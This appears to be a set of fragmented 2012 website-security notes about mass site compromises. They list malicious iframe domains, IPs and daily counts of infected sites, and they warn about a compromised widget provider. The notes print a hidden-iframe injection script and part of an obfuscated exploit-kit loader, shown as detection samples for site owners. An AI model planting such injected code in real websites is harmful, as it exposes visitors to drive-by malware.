Fragmented Technical Notes
If your site is loading hidden iframes from *.ftp1.biz/pony, look for a curlor file_get_contents call to http://wordpresstest2.info/1.txt.When you visit this site, it generates random iframes:
http://lsghmr.ftp1.biz/pony ( 206.212.240.20)
http://rchscbul.ftp1.biz/pony ( 206.212.240.20)
http://idzui.ftp1.biz/pony
http://vtfptnmxk.ftp1.biz/ponyThat are displayed on the compromised sites.
We are seeing a large number of sites compromised with an iframe pointing to http://fenwaywest.com/media/index.php .Just in the last 3 days, we identified almost 10,000 sites with it:
2012/Oct/11 - 4393 sites - http://fenwaywest.com/media/index.php
2012/Oct/10 - 3117 sites - http://fenwaywest.com/media/index.php
2012/Oct/09 - 865 sites - http://fenwaywest.com/media/index.php
On all the compromised sites have the iframes similar to this one:
<script> function frmAdd() { var ifrm = document.createElement("iframe"); ifrm. style.position="absolute'; ifrm.style.top='-999em'; ifrm.style.left='-999em'; ifrm.src = "http://fenwaywest.com/media/index.php";ifrm.id = 'frmId';document.body. appendChild (ifrm);};window.onload = frmAdd;..The domain is hosted at 50.28.53.157, but currently offline (redirecting to Google), so we can\’t really tell what it is doing. But on previous requests, it was redirecting to a TDS (traffic distribution system) and from there, being sent to multiple spam or malicious domains.
Update 2012/Oct/12: Their site was fixed and is not loading malware anymore.
If you are using any widget/code from http://badgeplz.com/, remove it asapfrom your site. It has been compromised and is serving malicious code. So ifyou have any widget from there, it will be loaded from your site as well (blackhole exploit kit).
Example:
$ curl -D - http://badgeplz.com/instagram/?u=user
<script>v="va"+"l";try{ebgserb++;}catc h(snregrx){try{(Math+"")()}catch(ztbet) {m= ..Note only that, but their main site is compromised as well.